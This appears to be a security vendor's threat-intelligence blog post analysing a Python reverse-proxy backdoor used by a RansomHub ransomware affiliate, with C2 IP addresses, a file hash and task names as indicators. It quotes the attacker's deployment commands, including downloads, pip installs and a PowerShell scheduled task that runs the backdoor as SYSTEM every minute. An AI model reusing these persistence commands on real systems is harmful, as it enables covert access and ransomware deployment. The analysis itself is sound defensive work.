RansomHub Affiliate leverages Python-based backdoor

In an incident response in Q4 of 2024, GuidePoint Security identified evidence of a threat actor utilizing a Python-based backdoor to maintain access to compromised endpoints. The threat actor later leveraged this access to deploy RansomHub encryptors throughout the entire impacted network. ReliaQuest documented an earlier version of this malware on their website in February 2024.
GuidePoint identified a few notable distinctions in the most recent version of the Python backdoor, including:

· Use of obfuscation from PyObfuscate[.]com

· Deployment via Remote Desktop Protocol (RDP) lateral movement

· Unique indicators of compromise, including filenames, scheduled task names, C2 addresses

While analyzing this malware, GuidePoint has identified 18 IP addresses associated with the C2 infrastructure of the Python backdoor. In collaboration with @drb_ra, we will post these IP addresses as “Ransomhub Python C2” in GitHub – drb-ra/C2IntelFeeds: Automatically created C2 Feeds.

Malware Deployment

Like ReliaQuest, GuidePoint identified evidence linking SocGholish (FakeUpdate) to the initial access phase of the incident. In the incident GuidePoint investigated, the Python backdoor was dropped roughly 20 minutes after the initial infection. Subsequently, the threat actor dropped Python backdoors on additional systems during lateral movement via RDP sessions.

The threat actor performed the following five steps to install Python and entrench the backdoor on all impacted systems:

1. Move to the designated target folder

cd c:\users\<redacted>\appdata\local\connecteddevicesplatform;

2. Install Python 

// wget https://www.python.org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip -OutFile .\python3.12.zip

3. Setup PIP and install required Python libraries 

// wget https://bootstrap.pypa.io/pip/pip.pyz -OutFile .\pip.pyz;.\pythonw.exe pip.pyz --trusted-host files.pythonhosted.org --trusted-host pypi.org install pycryptodome virtualenv requests pipx --upgrade pip --no-warn-script-location;

4. Create Python Proxy Script

C:\Users\<redacted>\AppData\Local\ConnectedDevicesPlatform\get-pip\get-pip2.pyd

5. Establish persistence with Windows scheduled tasks 

// powershell $a = New-ScheduledTaskAction -WorkingDirectory 'C:\Users\<redacted>\AppData\Local\ConnectedDevicesPlatform\get-pip' -Execute 'pythonw.exe' -Argument 'get-pip2.pyd';$t = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1);$s = New-ScheduledTaskSettingsSet -ExecutionTimeLimit '00:00:00' -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries;Register-ScheduledTask -TaskName 'get-pip2' -Action $a -Trigger $t -Settings $s -User 'system'

GuidePoint observed no significant differences between the deployment process on the initial system impacted by SocGholish and the subsequent systems affected. Given this new information, it seems more likely that the Python backdoor is a second-stage payload maintained separately and distributed via SocGholish, rather than a Python-based module.

Analysis of the Python Script 

Functionally, the script is a reverse proxy that connects to a hardcoded IP address. Once the script has passed the initial command-and-control (C2) handshake, it establishes a tunnel that is heavily based on the SOCKS5 protocol. This tunnel allows the threat actor to move laterally in the compromised network using the victim system as a proxy.

While researching this Python malware, we identified another version with a different C2 address, uploaded to VirusTotal on September 6, 2024. This sample has zero detections on VirusTotal at the time of this blog post.

Obfuscation and Coding Style

The Python script itself has undergone some surface-level changes but remains functionally the same as its previous counterpart, which was first seen on VirusTotal on December 6, 2023. Most of the changes are due to the obfuscation used to avoid detection, likely a modified version from the site PyObfuscate[.]com.

Once fully de-obfuscated, the Python code is extremely polished and well-written. The coding style suggests that the programmer is either meticulous about writing highly readable and testable Python code or is using AI-assisted code creation. With the exception of local variable obfuscation, the code is broken down into distinct classes with highly descriptive method names and variables. Each method also has a high degree of error handling and verbose debug messages. Based on our experience and research online, this level of consistency aligns with patterns often observed in AI-generated code.

Command-and-Control

While the previous version of the script passed the IP address and destination port as an argument, the obfuscated versions have these variables hardcoded in the default value, as seen in Figure 2.

Upon execution, the script attempts the following three C2 steps:

1. Create a TCP socket and establish a connection to the hardcoded IP address, then idle until receiving two non-null bytes. 
2. Establish a new TCP connection to the C2 address using the value of the previous two bytes as the new destination port. 
3. Create a SOCKS5-like tunnel through the new TCP connection.

Once the second connection is established, the compromised system acts as a proxy to the threat actors C2 address. Notably, the versions of the script we have obtained only support TCP tunneled traffic and do not support IPv6 addresses. Figure 3 contains detailed logging for unsupported address types and command codes. The expected values are consistent with the SOCKS5 network protocol despite not being fully implemented. Interestingly, the author, or likely an AI, included logging for the unimplemented sections.

Network traffic collected while analyzing the malware corroborates the analysis of the Python code. While using a live C2 as a target, the script successfully connected and received two bytes in its initial connection. After receiving numerous instances of null bytes, the C2 server finally responded with non-null bytes 22 2A.

The two bytes 22 2A are in network byte order (little-endian), which corresponds to the decimal value 10786. As expected, the next connection we observed from the system running the Python backdoor was on this destination port, shown in Figure 5.

The TCP stream associated with the second session corroborates the use of a SOCKS5-like tunnel. Figure 6 shows the TCP stream of the second session containing a tunneled HTTP request and response. The hex string outlined in orange corresponds to the target address, and the value outlined in purple corresponds to the destination port. For this session, the target address corresponds to a Google IP address, 142.250.68.110, and the destination port is 80.

Figure 7 contains both the tunneled C2 traffic and the proxied HTTP traffic to the Google IP address in a pattern consistent with proxied traffic.

Key Takeaways

This blog post highlights how ransomware affiliates continue to utilize a Python-based backdoor to maintain persistence and effectively evade security tools. Additionally, it demonstrates how threat actors are potentially adopting AI-assisted code to create and maintain their malware. As noted earlier, GuidePoint has identified additional C2 addresses associated with similar Python backdoors, most of which remain active at the time of this publication. Updates and details on these C2 addresses will be shared via the following feed: GitHub – drb-ra/C2IntelFeeds: Automatically created C2 Feeds.

More information

For any follow-up questions or concerns, please get in touch with GRIT at [email protected]

Additional Indicators of Compromise

Indicator	Detail
get-pip2.pyd	Python backdoor filename
get-pip2	Python backdoor task name
5089fd6ce6d8c0fca8d9c4af7441ee9198088bfba6e200e27fe30d3bc0c6401c	Python backdoor SHA256 hash

RansomHub Python C2

• 185.174.101.240
• 38.180.81.153
• 104.238.61.144
• 88.119.175.65
• 23.227.193.172
• 185.174.101.69
• 92.118.112.208
• 37.1.212.18
• 108.181.182.143
• 92.118.112.143
• 45.82.85.50
• 108.181.115.171
• 172.210.82.245
• 88.119.175.70
• 5.8.63.178
• 45.66.248.150
• 23.92.31.138
• 173.44.141.226